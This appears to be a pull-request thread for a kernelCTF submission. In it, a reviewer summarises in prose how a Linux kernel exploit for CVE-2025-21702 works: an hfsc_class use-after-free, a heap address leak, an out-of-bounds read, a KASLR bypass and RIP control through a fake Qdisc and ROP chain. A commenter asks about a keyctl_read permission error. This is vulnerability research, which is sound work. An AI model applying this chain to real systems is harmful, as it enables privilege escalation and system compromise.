Add kernelCTF CVE-2025-21702_lts_cos

[quanggle97]

No description provided.

[koczkatamas]

Hey!

FYI this is my summary of the writeup. Let me know if there is any incorrect information in this:

1. Refcounting issue on hfsc_class ("class_A") causing freeing the object and leaving a dangling pointer.
2. Convert it to heap address leak primitive:
   • Spray user_key_payload in the memory of hfsc_class, create another heap object (also hfsc_class, "class_B") which will be inserted into a red-black tree structure (hfsc_class->el_node) which will leak class_B->el_node into user_key_payload's data which can be read, so we have class_B's address (as it can be easily calculated from class_B->el_node).
3. Convert it to heap out-of-bounds read primitive:
   • Leak an address of hfsc_class class from the previous primitive, delete it and spray a fake user_key_payload with rb_node->rb_left pointing to user_key_payload->datalen and with the rb->__rb_parent_color = (unsigned long)p | color primitive we can overwrite the datalen field with a big number (the p kernel pointer), so it becomes an out-of-bounds primitive.
4. KASLR leak: sprays a lot of xfrm_policy and OOB reads and scanning and trying to identify xfrm_policy objects from the leak (via checking properties for having expected values) and it leaks xfrm_policy->timer.function which is the kernel symbol xfrm_policy_timer.
5. RIP control: spray a fake Qdisc + ROP chain with user_key_payload (its address is known from the heap address leak) and then replace the victim hfsc_class->Qdisc with the fake sprayed Qdisc object. Trigger Qdisc->enqueue for RIP control.
   • It needs to be triggered twice, as first will set qlen to 0 and hfsc_dequeue() will return early, second time, qlen will be 1 and hfsc_dequeue() will lead to code execution.

[bsauce]

_ No description provided. _

When testing the exploit, why keyctl_read() returns failure when leak the address of hfsc_class_B: "keyctl_read(): Permission Denied"??? Do we have permission to read the user key created by add_key()?